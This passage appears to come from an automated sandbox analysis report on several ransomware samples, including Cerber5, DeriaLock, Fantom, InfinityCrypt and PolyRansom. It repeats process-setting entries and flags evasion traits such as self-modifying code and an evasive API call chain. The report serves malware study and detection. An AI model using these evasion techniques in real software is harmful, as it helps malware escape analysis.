        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\101awtpm.1qs\Endermanch@NoMoreRansom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\101awtpm.1qs\Endermanch@NoMoreRansom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\101awtpm.1qs\Endermanch@NoMoreRansom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\101awtpm.1qs\Endermanch@NoMoreRansom.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcess
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 00000000004011AF instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 000000000040167A instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 0000000000401A79 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 0000000000401D19 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 0000000000401483 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 00000000004289F3 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 00000000004026BC instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 000000000042B245 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 00000000004241B1 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 00000000004244B9 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 00000000004266AB instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 0000000000426F0D instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 0000000000426903 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 0000000000423F1D instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 00000000004263F8 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 0000000000424BA3 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 00000000004286EE instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 000000000042888A instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 000000000042BA6F instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 000000000042A9D8 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 00000000004297F5 instructions caused by: Self-modifying code
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeSpecial instruction interceptor: First address: 0000000000428548 instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 00000000004011AF instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 000000000040167A instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 0000000000401A79 instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 0000000000401D19 instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 0000000000401483 instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 00000000004289F3 instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 00000000004026BC instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 000000000042B245 instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 00000000004241B1 instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 00000000004244B9 instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 00000000004266AB instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 0000000000426F0D instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 0000000000426903 instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 0000000000424BA3 instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 00000000004286EE instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 000000000042888A instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 0000000000428548 instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 0000000000427E90 instructions caused by: Self-modifying code
        Source: C:\Users\user\fakAAcAY\dekAkckQ.exeSpecial instruction interceptor: First address: 0000000000425D85 instructions caused by: Self-modifying code
